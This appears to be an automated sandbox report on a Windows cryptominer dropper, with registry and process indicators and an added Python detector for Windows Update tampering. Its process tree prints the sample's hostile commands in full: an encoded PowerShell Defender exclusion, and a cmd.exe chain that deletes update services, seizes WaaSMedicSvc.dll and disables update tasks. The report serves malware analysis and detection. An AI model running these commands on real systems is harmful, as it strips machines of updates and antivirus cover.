Analysis
max time kernel: 300s
max time network: 290s
platform: windows10-1703_x64
resource: win10-20220722-en
resource tags: arch:x64, arch:x86, image:win10-20220722-en, locale:en-us, os:windows10-1703-x64, system
submitted: 03-08-2022 22:15

Behavioral task: behavioral1
Sample: 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Resource: win7-20220718-en
General
Target: 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Size: 7.1MB
MD5: 322cf2f6a67420e4eb53f29263a639ba
SHA1: bc91f56c260ff4484f7fb0d33a3d351d3d812781
SHA256: 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
SHA512: 3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
XMRig Miner payload 6 IoCs
resource | yara_rule
behavioral2/memory/3832-470-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3832-471-0x000000014036EAC4-mapping.dmp | xmrig
behavioral2/memory/3832-472-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3832-475-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3832-478-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
behavioral2/memory/3832-487-0x0000000140000000-0x0000000140809000-memory.dmp | xmrig
Drops file in Drivers directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
Executes dropped EXE 1 IoCs
Processes:
pid | process
1304 | updater.exe
Possible privilege escalation attempt 4 IoCs
Processes:
pid | process
4520 | takeown.exe
4728 | icacls.exe
928 | takeown.exe
632 | icacls.exe

Stops running service(s) 3 TTPs
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | updater.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | updater.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes:
pid | process
928 | takeown.exe
632 | icacls.exe
4520 | takeown.exe
4728 | icacls.exe
YARA rule match: themida 8 IoCs
resource | yara_rule
behavioral2/memory/4956-127-0x0000000000400000-0x000000000106F000-memory.dmp | themida
behavioral2/memory/4956-128-0x0000000000400000-0x000000000106F000-memory.dmp | themida
behavioral2/memory/4956-130-0x0000000000400000-0x000000000106F000-memory.dmp | themida
C:\Program Files\Google\Chrome\updater.exe | themida
C:\Program Files\Google\Chrome\updater.exe | themida
behavioral2/memory/1304-276-0x0000000000400000-0x000000000106F000-memory.dmp | themida
behavioral2/memory/1304-275-0x0000000000400000-0x000000000106F000-memory.dmp | themida
behavioral2/memory/1304-280-0x0000000000400000-0x000000000106F000-memory.dmp | themida
Checks whether UAC is enabled 2 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
Drops file in System32 directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid | process
4956 | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
1304 | updater.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 4648 set thread context of 3832 | 4648 | conhost.exe | explorer.exe
Drops file in Program Files directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
File opened for modification | C:\Program Files\Google\Chrome\updater.exe | powershell.exe
File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe
Launches sc.exe 10 IoCs
sc.exe is the Windows command-line utility used to control services on the system.
Processes:
pid | process
3144 | sc.exe
3156 | sc.exe
820 | sc.exe
384 | sc.exe
3300 | sc.exe
2976 | sc.exe
4504 | sc.exe
1448 | sc.exe
3964 | sc.exe
1964 | sc.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Modifies registry key 1 TTPs 18 IoCs
Processes:
pid | process
2300 | reg.exe
4868 | reg.exe
2148 | reg.exe
1780 | reg.exe
1648 | reg.exe
4728 | reg.exe
4884 | reg.exe
4480 | reg.exe
3040 | reg.exe
1068 | reg.exe
1168 | reg.exe
4748 | reg.exe
1748 | reg.exe
5012 | reg.exe
4884 | reg.exe
1276 | reg.exe
652 | reg.exe
4132 | reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process | entries
5064 | powershell.exe | 3
4968 | conhost.exe | 1
3956 | powershell.exe | 3
2236 | powershell.EXE | 3
2836 | powershell.exe | 3
4648 | conhost.exe | 1
3832 | explorer.exe | all remaining entries
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
636 |
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid | process | tokens (in the order recorded)
5064 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
1916 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
4184 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
4236 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
4968 | conhost.exe | SeDebugPrivilege
2396 | powercfg.exe | SeShutdownPrivilege, SeCreatePagefilePrivilege
4520 | takeown.exe | SeTakeOwnershipPrivilege
3956 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid | source process | target pid | target process | writes recorded
4956 | 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe | 4968 | conhost.exe | 3
4968 | conhost.exe | 5064 | powershell.exe | 2
4968 | conhost.exe | 5092 | cmd.exe | 2
4968 | conhost.exe | 1224 | cmd.exe | 2
5092 | cmd.exe | 1964 | sc.exe | 2
1224 | cmd.exe | 1916 | powercfg.exe | 2
5092 | cmd.exe | 3300 | sc.exe | 2
5092 | cmd.exe | 2976 | sc.exe | 2
5092 | cmd.exe | 3144 | sc.exe | 2
5092 | cmd.exe | 3156 | sc.exe | 2
5092 | cmd.exe | 4132 | reg.exe | 2
1224 | cmd.exe | 4184 | powercfg.exe | 2
1224 | cmd.exe | 4236 | powercfg.exe | 2
5092 | cmd.exe | 1748 | reg.exe | 2
1224 | cmd.exe | 2396 | powercfg.exe | 2
5092 | cmd.exe | 5012 | reg.exe | 2
5092 | cmd.exe | 3040 | reg.exe | 2
5092 | cmd.exe | 4480 | reg.exe | 2
5092 | cmd.exe | 4520 | takeown.exe | 2
5092 | cmd.exe | 4728 | icacls.exe | 2
4968 | conhost.exe | 3956 | powershell.exe | 2
5092 | cmd.exe | 4884 | reg.exe | 2
5092 | cmd.exe | 2148 | reg.exe | 2
5092 | cmd.exe | 1780 | reg.exe | 2
5092 | cmd.exe | 1648 | reg.exe | 2
5092 | cmd.exe | 1668 | schtasks.exe | 2
5092 | cmd.exe | 2764 | schtasks.exe | 2
5092 | cmd.exe | 2768 | schtasks.exe | 2
5092 | cmd.exe | 4264 | schtasks.exe | 2
5092 | cmd.exe | 4260 | schtasks.exe | 2
5092 | cmd.exe | 2540 | schtasks.exe | 2
5092 | cmd.exe | 2344 | schtasks.exe | 1
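The signatures above record the five `sc stop` calls, the five service-key deletions, the takeown/icacls pair on WaaSMedicSvc.dll, the WindowsUpdate\AU policy writes and the disabled scheduled tasks as separate IoCs; in the process tree they are a single `cmd.exe /c` chain. The Python below is an added example, not part of the sandbox report or of the sample: it splits such a chain the way cmd.exe does (on `&`, `&&`, `|`, `||` outside double quotes), pulls the indicators out of each sub-command, and counts how many independent update-disabling techniques co-occur. `OBSERVED` is the command line copied from the cmd.exe entry in the process tree; the indicator sets, the field names and the two-technique threshold are the author's choices for this sample, not an exhaustive catalogue.

```python
"""Pull Windows Update tampering indicators out of a cmd.exe command chain.

Added example for this report; not part of the sandbox's tooling or of the
sample.  OBSERVED is the cmd.exe command line copied from the process tree.
The indicator sets and the two-technique threshold are the author's choices.
"""
import re

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
AU_POLICY_KEY = r"hklm\software\policies\microsoft\windows\windowsupdate\au"
SERVICE_KEY_RE = re.compile(r"hklm\\system\\currentcontrolset\\services\\([^\\\s]+)$")
TASK_RE = re.compile(r'/tn\s+"([^"]+)"\s+/disable', re.I)

OBSERVED = (  # copied from the process tree: everything after 'cmd.exe /c'
    r"sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & "
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & "
    r"takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & "
    r"icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & "
    r"rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & "
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & "
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
)


def split_chain(cmdline: str) -> list[str]:
    """Split on '&', '&&', '|' and '||' as cmd.exe does, ignoring operators inside double quotes."""
    parts, buf, in_quote, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quote = not in_quote
        if ch in "&|" and not in_quote:
            parts.append("".join(buf).strip())
            buf = []
            if i + 1 < len(cmdline) and cmdline[i + 1] == ch:  # doubled operator: && or ||
                i += 1
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def _switch_value(tokens: list[str], switch: str) -> str:
    """Value following a /switch (case-insensitive), or '' when absent."""
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() == switch:
            return tokens[i + 1]
    return ""


def classify(cmdline: str) -> dict:
    """Collect per-technique indicators from every sub-command in the chain."""
    found = {"services_stopped": set(), "service_keys_deleted": set(), "au_policy": {},
             "acl_targets": set(), "renamed": [], "tasks_disabled": []}
    for cmd in split_chain(cmdline):
        tokens = cmd.split()
        verb = tokens[0].lower()
        if verb == "sc" and len(tokens) >= 3 and tokens[1].lower() == "stop":
            found["services_stopped"].add(tokens[2].lower())
        elif verb == "reg" and len(tokens) >= 3:
            action, key = tokens[1].lower(), tokens[2].lower()
            m = SERVICE_KEY_RE.match(key)
            if action == "delete" and m:
                found["service_keys_deleted"].add(m.group(1))
            elif action == "add" and key == AU_POLICY_KEY:
                found["au_policy"][_switch_value(tokens, "/v").lower()] = _switch_value(tokens, "/d")
        elif verb == "takeown":
            found["acl_targets"].add(_switch_value(tokens, "/f").lower())
        elif verb == "icacls" and len(tokens) >= 2:
            found["acl_targets"].add(tokens[1].lower())
        elif verb == "rename" and len(tokens) >= 3:
            found["renamed"].append((tokens[1], tokens[2]))
        elif verb == "schtasks":
            m = TASK_RE.search(cmd)
            if m:
                found["tasks_disabled"].append(m.group(1))
    return found


def update_kill_verdict(found: dict) -> tuple[bool, int]:
    """(flagged, techniques_seen): flag when two or more independent techniques co-occur."""
    techniques = [
        bool(found["services_stopped"] & UPDATE_SERVICES),
        bool(found["service_keys_deleted"] & UPDATE_SERVICES),
        found["au_policy"].get("noautoupdate") == "1",
        any(t.endswith("waasmedicsvc.dll") for t in found["acl_targets"]),
        any("\\windowsupdate\\" in t.lower() or "\\updateorchestrator\\" in t.lower()
            for t in found["tasks_disabled"]),
    ]
    seen = sum(techniques)
    return seen >= 2, seen


if __name__ == "__main__":
    hits = classify(OBSERVED)
    print(update_kill_verdict(hits), sorted(hits["services_stopped"]), hits["au_policy"])
```

Running the block against `OBSERVED` returns a verdict of `(True, 5)`: every technique the checker knows about is present. The threshold is deliberately set at two so that a lone `sc stop wuauserv` from an administrator's script does not fire, while the combination of stopping the service, deleting its key and writing `NoAutoUpdate=1` does.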
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
